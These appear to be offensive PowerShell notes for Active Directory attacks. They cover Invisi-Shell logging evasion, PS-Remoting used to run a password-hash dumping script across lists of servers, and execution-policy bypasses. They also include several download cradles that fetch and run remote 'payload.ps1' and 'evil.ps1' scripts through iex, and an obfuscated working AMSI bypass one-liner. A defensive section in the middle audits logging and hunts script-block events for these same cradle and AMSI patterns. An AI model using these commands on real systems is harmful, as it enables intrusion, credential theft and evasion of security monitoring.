Offensive Powershell

powershell notes

start invishell with AD libs

cd C:\AD\Tools\
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

PowerShell and AD

  • [ADSI]
  • System.DirectoryServices.ActiveDirectory
  • WMI
  • Active Directory Module

PS-Remoting

  • uses winrm in the background
  • Port 5985, 5986
  • enabled by default on windows servers, needs to be enabled on client machines
PS> Enter-PSSession -ComputerName us-mgmt
 
PS> Get-PSHostProcessInfo # show processes (wsmprovhost)
 
PS> $session = New-PSSession -ComputerName us-mgmt
PS> Enter-PSSession -Session $session
 
# one-to-many fanout, non-interactive
PS> Invoke-Command -ComputerName us-mgmt -ScriptBlock{hostname;whoami}
PS> Invoke-Command -Session $session -ScriptBlock{hostname}
PS> Invoke-Command -Credential # to pass username/password
PS> Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
PS> Invoke-Command -FilePath c:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
PS> Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName ..
PS> Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName .. -ArgumentList
 
PS> winrs -remote:server1 -u:server1\administrator -p:password hostname
  • also look into WSMan-WinRM
  • Kerberos credentials are not forwarded (double-hop problem)
    • enable CredSSP so the credentials are delegated to the remote host

powershell detections

  • system-wide transcripts
  • script block logging
  • AMSI (Antimalware Scan Interface)
  • Constrained Language Mode (CLM)

Can use Invisi-Shell to bypass much of that: RunWithRegistryNonAdmin.bat
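From the defender's side, the controls listed above are only useful if they are actually enforced and someone reads the output. The following is an added example (not part of the original notes) that checks the policy registry keys for script block logging and transcription, reports the current language mode, and then hunts Event ID 4104 (script block logging) for the download-cradle and AMSI-tampering strings that appear in these notes. The regex list and the 24-hour window are my assumptions.

```powershell
# Added example: audit PowerShell logging posture and hunt 4104 events.
function Get-PSLoggingPosture {
    $sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $tr  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
    [pscustomobject]@{
        ScriptBlockLogging = [bool](Get-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue).EnableScriptBlockLogging
        Transcription      = [bool](Get-ItemProperty -Path $tr  -Name EnableTranscripting -ErrorAction SilentlyContinue).EnableTranscripting
        TranscriptDir      = (Get-ItemProperty -Path $tr -Name OutputDirectory -ErrorAction SilentlyContinue).OutputDirectory
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode   # FullLanguage vs ConstrainedLanguage
    }
}

# Indicator patterns taken from the cradles and the AMSI one-liner in these notes (assumed list).
# Note: 4104 records the script block text as parsed; content pulled in via iex or
# -EncodedCommand is logged when it runs as its own block, but in-line string
# splitting ('a'+'msi') is NOT resolved, so such variants will not match literally.
$Suspicious = @(
    'DownloadString',
    'Net\.WebClient',
    'Msxml2\.XMLHTTP',
    'InternetExplorer\.Application',
    'GetResponseStream',
    'Invoke-Expression|\biex\b',
    'amsiInitFailed',
    'AmsiUtils'
)

function Find-SuspiciousScriptBlocks {
    param([int]$Hours = 24, [int]$MaxEvents = 5000)
    $filter = @{ LogName   = 'Microsoft-Windows-PowerShell/Operational'
                 Id        = 4104
                 StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value    # ScriptBlockText field of a 4104 event
            $hits = $Suspicious | Where-Object { $text -match $_ }
            if ($hits) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Host    = $_.MachineName
                    Pattern = ($hits -join ', ')
                    Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

Get-PSLoggingPosture
Find-SuspiciousScriptBlocks -Hours 24 | Format-Table -AutoSize
```

Running the posture check in a session started through Invisi-Shell is a quick way to see that the logging switches are off for that process even though the registry says otherwise.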

execution policy

  • not a security feature
powershell -ExecutionPolicy bypass
powershell -c <cmd>
powershell -EncodedCommand <base64_cmd>
$env:PSExecutionPolicyPreference = "bypass"

download cradles

iex (New-Object Net.WebClient).DownloadString('https://url/payload.ps1')
 
$ie = New-Object -ComObject InternetExplorer.Application
$ie.visible = $False
$ie.navigate('https://url/payload.ps1')
sleep 5
$response = $ie.Document.body.innerHTML
$ie.quit()
iex $response
 
# (for PSv3):
iex (iwr 'http://url/evil.ps1')
 
$h = New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET', 'https://url/evil.ps1', $false)
$h.send()
iex $h.responseText
 
$wr = [System.NET.WebRequest]::Create('https://url/evil.ps1')
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

AMSI bypass in powershell

PS> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ;( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )